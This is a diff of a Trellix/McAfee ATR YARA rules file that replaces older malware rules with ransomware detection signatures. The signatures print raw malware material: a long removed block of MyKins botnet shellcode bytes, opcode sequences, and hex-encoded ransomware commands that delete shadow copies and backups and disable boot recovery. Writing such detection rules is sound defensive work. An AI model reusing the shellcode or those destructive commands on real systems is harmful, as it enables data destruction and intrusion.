+		$first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 }
+		$first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
+		$first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
+		$first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3}
+		$files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 }
+		$files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????}
+		$files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??}
 
 	condition:
-		uint16( 0 ) == 0x3030 and filesize < 4000KB and any of them
+		filesize <= 300KB and any of ( $first_stage* ) and any of ( $files_encryption* )
 }
-rule TRELLIX_ARC_Malw_Eicar : EICAR
+
+rule TRELLIX_ARC_Ransom_Avoslocker : FILE
 {
 	meta:
-		description = "Rule to detect the EICAR pattern"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "16307b03-7fab-5d68-ad3b-0efcea952fcf"
-		date = "2026-02-01"
-		modified = "2020-08-14"
-		reference = "https://www.eicar.org/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Eicar.yar#L1-L22"
+		description = "Rule to detect Avoslocker Ransomware"
+		author = "CB @ ATR"
+		id = "50f029c8-154e-583d-8264-8d86d01075f6"
+		date = "2021-07-22"
+		modified = "2021-07-22"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Avoslocker.yar#L3-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
-		logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533"
+		logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3"
 		score = 75
 		quality = 70
-		tags = "EICAR"
-		malware_type = "eicar"
-		malware_family = "W32/Eicar"
-		actor_type = "Unknown"
-		actor_group = "Unknown"
+		tags = "FILE"
+		Version = "v1"
+		DetectionName = "Ransom_Win_Avoslocker"
+		hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
+		hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
 
 	strings:
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii
+		$v2 = "CryptStringToBinary failed. Err: %d" fullword ascii
+		$v3 = "encrypting %ls failed" fullword wide
+		$v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii
+		$v5 = "operator co_await" fullword ascii
+		$v6 = "drive %s took %f seconds" fullword ascii
+		$seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff }
+		$seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 }
+		$seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff }
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "a24c2b5bf84a5465eb75f1e6aa8c1eec" and ( 5 of them ) and all of ( $seq* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE
+
+rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect backdoor Havex based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a667bb4e-8c38-59a6-8ae0-09c44961a687"
-		date = "2012-11-17"
-		modified = "2020-08-14"
-		reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_havex_pdb.yar#L1-L26"
+		description = "Rule to detect tthe ThunderX ransomware family"
+		author = "McAfee ATR team"
+		id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34"
+		date = "2020-09-14"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_ThunderX.yar#L3-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255"
-		logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd"
+		logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Havex"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/ThunderX"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6"
+		hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666"
+		hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e"
 
 	strings:
-		$pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb"
-		$pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb"
+		$pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
+		$s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
+		$s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
+		$s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
+		$s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
+		$s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii
+		$s13 = "7B5041545445524E5F49447D" ascii
+		$s14 = "726561646D652E747874" ascii
+		$s15 = "226E6574776F726B223A22" ascii
+		$s16 = "227375626964223A22" ascii
+		$s17 = "226C616E67223A22" ascii
+		$s18 = "22657874223A22" ascii
+		$s19 = "69642E6B6579" ascii
+		$s20 = "7B5549447D" ascii
+		$seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc }
+		$seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 }
+		$seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ( $seq* ) or ( all of them )
 }
-rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE
+rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the shellcode used in the MyKins Botnet"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "9dc80b27-59e2-5925-9bb7-64a54241f52b"
-		date = "2018-01-24"
+		description = "Robbinhood GoLang ransowmare"
+		author = "Christiaan Beek | McAfee ATR"
+		id = "b2654d00-330e-511e-b8f1-75aa7b57d040"
+		date = "2019-05-10"
 		modified = "2020-08-14"
-		reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_shellcode_mykins_botnet.yar#L1-L27"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_RobbinHood.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976"
+		hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e"
+		logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038"
 		score = 75
 		quality = 70
-		tags = "SHELLCODE, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "shellcode"
-		malware_family = "ShellCode:W32/MyKins"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Robbinhood"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 }
-		$b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF }
+		$s1 = ".enc_robbinhood" nocase
+		$s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
+		$s3 = "pub.key" nocase
+		$s4 = "main.EnableShadowFucks" nocase
+		$s5 = "main.EnableRecoveryFCK" nocase
+		$s6 = "main.EnableLogLaunders" nocase
+		$s7 = "main.EnableServiceFuck" nocase
+		$op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d }
+		$op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f }
+		$op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd }
 
 	condition:
-		filesize < 1KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $s* ) ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE
+rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Demekaf dropper based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "b49f42c1-d737-5afa-b547-7268e4cde360"
-		date = "2011-03-26"
-		modified = "2020-08-14"
-		reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html"
